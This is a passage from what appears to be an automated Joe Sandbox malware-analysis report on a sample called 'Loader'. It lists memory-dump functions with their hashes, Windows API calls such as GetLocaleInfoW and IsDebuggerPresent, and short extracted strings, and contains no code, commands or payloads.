                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe3a01634ec45b837dc4a81c7e917b7076376c022749e8f93f7187d6b767d7fe
                                                                                        • Instruction ID: c0f05474c2a5daddbd09f5f4aba9ed7dee46297d1de721b98255c0bb7fdfb8ab
                                                                                        • Opcode Fuzzy Hash: fe3a01634ec45b837dc4a81c7e917b7076376c022749e8f93f7187d6b767d7fe
                                                                                        • Instruction Fuzzy Hash: 21419A31A1410AEBCB14DF68C4908FEB7F9FF08304B60106AE542F7640E731E945CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 808eb93c0b1de5a631621ca2dfbdf026199f4534b1c4aae4253946ccbbf531dc
                                                                                        • Instruction ID: c4c66dec2dd207dc5f112ddc9b2f85a2f26a7ebee968a79a19cb513703a3dbaf
                                                                                        • Opcode Fuzzy Hash: 808eb93c0b1de5a631621ca2dfbdf026199f4534b1c4aae4253946ccbbf531dc
                                                                                        • Instruction Fuzzy Hash: 6E01F93320061D9F9B159F6DED82E9733E6B780B64B245228FA15BF154DB32DC058750
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00ECCD3A,?,?,00ECCD3A,00000220,?,00000000,?), ref: 00ECAD93
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: efe3dd38897815259d9d7c7af8a35466914969b7e5f6e37a0ff35e079b838df1
                                                                                        • Instruction ID: 899f14208bc35d94b55aaf203d968aab00c39d165189ffbfa5c8da3c4d2e96a3
                                                                                        • Opcode Fuzzy Hash: efe3dd38897815259d9d7c7af8a35466914969b7e5f6e37a0ff35e079b838df1
                                                                                        • Instruction Fuzzy Hash: 46E0A72110031C56962126B19E01F5A3E989B817AEF1D2179BC0AB59D0EE12CC0245D3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "t$"t
                                                                                        • API String ID: 0-1451024413
                                                                                        • Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                        • Instruction ID: b4c3dd1bf09823f08aeb12bbd8437f8bff72997974d1d928771d8ded679ca4a1
                                                                                        • Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                        • Instruction Fuzzy Hash: DF023B71E012199BDB14CFA9DA84BAEBBF1FF48314F15826DD515B7341D732A902CB90
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00ED016A
                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00ED01A8
                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00ED01BB
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00ED0203
                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00ED021E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                        • String ID: `/
                                                                                        • API String ID: 415426439-3547518435
                                                                                        • Opcode ID: e8cfa347b7e235f35747f3395c9ef94b7e51029c8ca17205d4f637319385787d
                                                                                        • Instruction ID: 148a8f32efa4d5867bbaf36c30e5e925a99ca7aa07c952a1d3623a04d7f5ca7d
                                                                                        • Opcode Fuzzy Hash: e8cfa347b7e235f35747f3395c9ef94b7e51029c8ca17205d4f637319385787d
                                                                                        • Instruction Fuzzy Hash: 64517071A01209AFDB10DFA5DC45BBA77F8EF54714F08142AF905FB2A1E7B0DA068B61
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: __floor_pentium4
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 4168288129-2761157908
                                                                                        • Opcode ID: f78e12a77f18adc1b0bc59f29408e6ab1593ddc35768cfe4cf9860c38b839f01
                                                                                        • Instruction ID: de672be145dba2af16b1d2db1ae2e77077469352afb17975043849c90ac21610
                                                                                        • Opcode Fuzzy Hash: f78e12a77f18adc1b0bc59f29408e6ab1593ddc35768cfe4cf9860c38b839f01
                                                                                        • Instruction Fuzzy Hash: F8D22771E082298FDB65CF28DD407EAB7B5EB44304F1451EAD84DB7240EB79AE868F41
                                                                                        APIs
                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0860
                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00ED0198,00000002,00000000,?,?,?,00ED0198,?,00000000), ref: 00ED0889
                                                                                        • GetACP.KERNEL32(?,?,00ED0198,?,00000000), ref: 00ED089E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID: ACP$OCP
                                                                                        • API String ID: 2299586839-711371036
                                                                                        • Opcode ID: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
                                                                                        • Instruction ID: b1ec24fbffcb299ffdf07978b1a6e6e05714fb3850e8383180ebe8bf3a48851d
                                                                                        • Opcode Fuzzy Hash: 0594797cdd572dfd6361d1fa1c89c1a3f7925d437b8a4b8cadec458b36fdf47e
                                                                                        • Instruction Fuzzy Hash: CB21F92AA001449ADB388B55C94179773A6EF90B68F5E9026E80AF7310E731DD42E3D0
                                                                                        APIs
                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED0E99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: b2d9f2469af023ddc3c30cebd123717b41b5f4d0d9f06c5d28fe51389b989e9b
                                                                                        • Instruction ID: 22a29920c7d53a93da275ec8971d224237e2b005441335659cc7492cde7e7ec4
                                                                                        • Opcode Fuzzy Hash: b2d9f2469af023ddc3c30cebd123717b41b5f4d0d9f06c5d28fe51389b989e9b
                                                                                        • Instruction Fuzzy Hash: 0C71D27194515C6FDF30AF24CC89BAEBBB9EB05308F1851DAE409B7351EA315E868F10
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00EBE438
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00EBE504
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EBE51D
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00EBE527
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 254469556-0
                                                                                        • Opcode ID: 157811f0cf929d448ce4bc6303d7c5355ae894509ddaf118535834ffefa1a6eb
                                                                                        • Instruction ID: bf2f94e5c44a02140c404377765d91ba14535ab9a097f871884b37a7e6de7f12
                                                                                        • Opcode Fuzzy Hash: 157811f0cf929d448ce4bc6303d7c5355ae894509ddaf118535834ffefa1a6eb
                                                                                        • Instruction Fuzzy Hash: 3731D8B5D0121C9BDB21DFA5D9897CDBBF8AF08304F1041EAE40DAB250EB759A85CF45
                                                                                        APIs
                                                                                          • Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
                                                                                          • Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED03A2
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED03EC
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00ED04B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 661929714-0
                                                                                        • Opcode ID: da18c4fb06d59c714e69c8aeb4972c6de07166f04ab46d930bb44e6b7adb1895
                                                                                        • Instruction ID: d74e960488a182381c680fdec58e8dfd3adf4797b9f610cda0dc091562d5c4c1
                                                                                        • Opcode Fuzzy Hash: da18c4fb06d59c714e69c8aeb4972c6de07166f04ab46d930bb44e6b7adb1895
                                                                                        • Instruction Fuzzy Hash: BE61A0719001079FEB28DF25DD82BAA77A8FF44304F18517AED15EA681EB34D982DF90
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00EC73F5
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00EC73FF
                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00EC740C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 9112da750e51bc3efd03c41e9b9add7c38b59a7c7431bffded667976a33687d9
                                                                                        • Instruction ID: d603abff9aa36782bbaeac7954d66ae75ac3a11e46e60f7a1821549197c2f899
                                                                                        • Opcode Fuzzy Hash: 9112da750e51bc3efd03c41e9b9add7c38b59a7c7431bffded667976a33687d9
                                                                                        • Instruction Fuzzy Hash: A431A2749012199BCB21DF65D989BCDBBF8BF08310F5051EAE41CB72A1E7709B858F44
                                                                                        APIs
                                                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00EBEA53,?,?,?,?,00EBEA77,000000FF,?,?,?,00EBE971,00000000), ref: 00EBEB88
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,C4C39003,?,?,00EDB30E,000000FF,?,00EBEA53,?,?,?,?,00EBEA77,000000FF,?), ref: 00EBEB8C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem$Precise
                                                                                        • String ID:
                                                                                        • API String ID: 743729956-0
                                                                                        • Opcode ID: 5b30f0cd4cf5e5aa4c0fdad30d96933234eef8d2173d6e83bc75dfac277293b5
                                                                                        • Instruction ID: 1cffd6e8d65f81fc652c0cc338a2ddcfa54e97d9447b79bdec6d8c6ad105dab4
                                                                                        • Opcode Fuzzy Hash: 5b30f0cd4cf5e5aa4c0fdad30d96933234eef8d2173d6e83bc75dfac277293b5
                                                                                        • Instruction Fuzzy Hash: D9F03776944558DFC7119F45DC81F9977A8E708B50F01426AF812A77D0D77459048BD4
                                                                                        APIs
                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ED435A,?,?,?,?,?,?,00000000), ref: 00ED462C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID:
                                                                                        • API String ID: 3997070919-0
                                                                                        • Opcode ID: d29da587ea7ec99406393c8f55f1c4eab44674b1e6329402439dc89899dbffed
                                                                                        • Instruction ID: c4e7b0134414a6d072ecba0d85bb602ef02d2e4797a3fe1ec0a2b2c37833062e
                                                                                        • Opcode Fuzzy Hash: d29da587ea7ec99406393c8f55f1c4eab44674b1e6329402439dc89899dbffed
                                                                                        • Instruction Fuzzy Hash: BDB14DB11106089FD715CF28C48ABA47BE0FF55368F25965AE8AADF3E1C335D992CB40
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EBE0AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 2325560087-0
                                                                                        • Opcode ID: 7485bcf38b9406e9713827ef8fe9421574324a2818d9e17bb72176cf555e7b6c
                                                                                        • Instruction ID: d61fbb86313ee9c9c1947ef659d43b0797ea57766dbf6a8af4ff97f8c9e581d7
                                                                                        • Opcode Fuzzy Hash: 7485bcf38b9406e9713827ef8fe9421574324a2818d9e17bb72176cf555e7b6c
                                                                                        • Instruction Fuzzy Hash: F5A15BB19016498FDB18CF5AD8C16DABBF1FB58364F28912AE451FB3A0D3349848CF54
                                                                                        APIs
                                                                                          • Part of subcall function 00ECC0E0: HeapAlloc.KERNEL32(00000008,?,?,?,00ECB000,00000001,00000364,?,00000005,000000FF,?,00EC495A,00EE56B0,0000000C), ref: 00ECC121
                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED0E99
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00ED0F8D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00ED0FCC
                                                                                        • FindClose.KERNEL32(00000000), ref: 00ED0FFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                        • String ID:
                                                                                        • API String ID: 2701053895-0
                                                                                        • Opcode ID: d8efe53e81cf7ac075f0a7349e3f1e9cd2c722c5d8ab931dfaa861150161c643
                                                                                        • Instruction ID: 62690f5903a6f2724b25ef64c91e848892e902ba26eeba2144265c08850f016e
                                                                                        • Opcode Fuzzy Hash: d8efe53e81cf7ac075f0a7349e3f1e9cd2c722c5d8ab931dfaa861150161c643
                                                                                        • Instruction Fuzzy Hash: FC5129719001186FDF249F689C85BBE7BAADB45318F18619FF819B7301EA319D439B60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0
                                                                                        • API String ID: 0-4108050209
                                                                                        • Opcode ID: 7c3931074ef244733a7b6f00ce4504df995dc7f937aca642667215a0a12cb5af
                                                                                        • Instruction ID: 911c9073d06eb231f0fe8d54449b603ea6f70905eb52f413fa4207e7c742cca6
                                                                                        • Opcode Fuzzy Hash: 7c3931074ef244733a7b6f00ce4504df995dc7f937aca642667215a0a12cb5af
                                                                                        • Instruction Fuzzy Hash: 02C1E474A007468FCB24CE78C695FBAB7B1AB15308F14AA1CD592B7691C3339E47CB51
